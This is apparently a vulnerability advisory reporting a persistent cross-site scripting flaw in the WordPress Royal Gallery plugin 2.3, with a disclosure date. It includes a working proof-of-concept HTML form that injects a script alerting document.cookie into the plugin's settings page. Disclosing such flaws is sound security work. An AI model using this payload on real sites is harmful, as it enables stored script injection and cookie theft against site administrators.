The Royal Gallery plugin has a persistent cross-site scripting (XSS) vulnerability (and possibly other security issues) as of version 2.3. The details of the underlying issue that causes this can be found in our post for the same vulnerability in the plugin Flip Slideshow, which shares the same vulnerable code.
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=splendidgallery_settings.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <head> </head> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=splendidgallery_settings" method="post"> <input type="hidden" name="task" value="save_spg_settings" /> <input type="hidden" name="settings[bannerWidth]" value='"><script>alert(document.cookie);</script>' /> <input type="submit" name="submit" value="Submit" /> </form> </body> </html>
- 6/7/2016 – WordPress.org Plugin Directory notified.